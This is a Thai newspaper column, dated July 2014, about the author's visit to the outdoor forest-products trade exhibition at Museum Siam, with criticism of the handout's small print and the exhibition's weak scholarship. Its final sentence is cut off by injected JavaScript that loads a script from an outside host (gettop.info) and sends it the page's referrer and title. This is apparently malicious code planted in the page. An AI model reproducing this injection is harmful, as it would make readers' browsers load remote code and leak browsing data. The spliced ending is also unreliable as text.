Download PDF

มติชนรายวัน ฉบับประจำวันพฤหัสบดีที่ 17 กรกฎาคม  2557

 

ค้าของป่า ที่มิวเซียมสยาม

          เพิ่งรู้ว่ามีนิทรรศการกลางแจ้งที่มิวเซียมสยาม (ท่าเตียน) เรื่องค้าของป่า เมื่ออ่านรายงานข่าวดีไลฟ์ ในประชาชาติ (ฉบับวันพฤหัสบดีที่ 10 กรกฎาคม 2557 หน้า 34)

          รุ่งขึ้น วันหยุดอาสาฬหบูชา (ศุกร์ที่ 11 กรกฎาคม) แต่ไม่แน่ใจว่ามิวเซียมสยามหยุดหรือไม่? เลยเสี่ยงไปดูตอนบ่ายๆ

          โดยเดินเข้าประตูด้านหลัง (ทาง รร. ราชินี ปากคลองตลาด ริมแม่น้ำเจ้าพระยา) อย่างเก้ๆ กังๆ กลัวๆ กล้าๆ เพราะตั้งแต่มีชีวิตมาก็ไม่เคยเข้าไปในที่แห่งนี้

          เดินดูนิทรรศการกลางแจ้งจนหมด แล้วทวนอีกรอบ เพราะชอบ จึงมองหาเอกสารประกอบ แต่ไม่พบ เลยเดินเสาะหาจนหลงเข้าไปอาคารหลักด้านหน้าที่มีห้องขายของที่ระลึก

          ถามเจ้าหน้าที่ขายของ เขาบอกว่าปกติมีเอกสารแจกบริเวณจัดแสดง ถ้าไม่มีก็คงแจกหมดแล้ว

          ผมได้ยินก็ใจหาย เพราะเสียดาย แล้วตำหนิตัวเองที่ไม่รู้จักติดตามข่าวสารมิวเซียมสยามตั้งแต่แรก เพราะเขาจัดแสดงมาตั้งแต่ 30 พฤษภาคม แต่ไม่เคยรู้ข่าวนี้

          (ค้าของป่า ที่มิวเซียมสยาม นิทรรศการกลางแจ้ง มีถึง 28 กันยายน 2557)

          ทอดน่องท่องนิทรรศการค้าของป่าเป็นรอบที่ 3 ต้องควักกระดาษกับปากกาจะจดข้อความที่คิดว่าจะเก็บมาเขียนบอกกล่าวไว้ในคอลัมน์นี้

          จดได้ 3-4 บรรทัดยังไม่ทันจบข้อความ ก็มีเจ้าหน้าที่สาวชุดดำเดินมาขอติดสติ๊กเกอร์เพื่อเป็นสถิติจำนวนผู้เข้าชม

          ผมถามหาเอกสารประกอบนิทรรศการ เธอบอกว่ามี แล้วเดินหายไปสำนักงานพักหนึ่งกลับมาพร้อมยื่นหนังสือบางๆให้ 1 เล่ม

          ผมรับไว้ด้วยสำนึกในพระเดชพระคุณ แล้วซักถามพูดคุย จึงรู้ว่าเป็นพนักงานลูกจ้างมาจาก จ. ตราด เรียนจบรามคำแหง ชื่อ กฤษณา หมายหาทรัพย์ ที่มีอัธยาศัยไมตรีดีมากๆ หายากในพิพิธภัณฑ์ของทางการไทย

          ข้อมูลในหนังสือแจกอ่านสนุกดี แต่อ่านยากอย่างยิ่ง

          เพราะขนาดตัวพิมพ์ “จิ๋ว”เอาใจวัยรุ่นเท่านั้น จนผมรู้สึกตัวเองถูกกีดกันออกนอกอาณาบริเวณของความรู้เรื่องค้าของป่าคราวนี้ เรื่องนี้ควรแก้ไขให้ฟอนต์และพอยต์อยู่ในมาตรฐานสากล อย่าตามอำเภอใจฝ่ายจัดหน้าหนังสือ

          ผู้เดินดูนิทรรศการกลางแจ้งเป็นวัยรุ่นเกือบหมด น่าดีใจอย่างยิ่ง เพราะตรงข้ามกับพิพิธภัณฑ์ของทางการไทย

          แต่ยังขาดอะไรบางอย่างที่ควรเติมให้เต็ม เพราะทำได้ไม่ยาก คือวิชาการ ซึ่งยังไม่เข้มแข็ง จึงดูขาดๆ วิ่นๆ ส่งผลให้ตีความประวัติศาสตร์คลาดเคลื่อน

          มิวเซียมสยาม ไม่ใช่มิวเซียมเด็ก, หรือมิวเซียมวัยรุ่น, ฯลฯ แต่เป็นมิวเซียมหลักซึ่งเป็นแหล่งเรียนรู้ของคนทุกเพศทุกวัย เด็กดูได้ ผู้ใหญ่ก็ชอบดู

          เหมือนมิวเซียมหลักๆของบ้านเมืองก้าวหน้าในโลก เช่น บริติชมิวเซียม ในอังกฤษ, สมิธโซเนียน ในวอชิงตัน ดี.ซี., เมโทรโปลิแทน ในนิวยอร์ก, ฯลฯ

          วิธีการนำเสนอต้องร่วมสมัยหรือทันสมัย (จะเป็นวัยรุ่นก็ได้ อย่างกรณีค้าของป่านี้)

          แต่โดยหลักแล้วต้องเอื้อต่อคนทั่วไปเป็นสำคัญที่สุด ไม่เฉพาะวัยรุ่นเท่านั้น อย่าหลงทางs.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;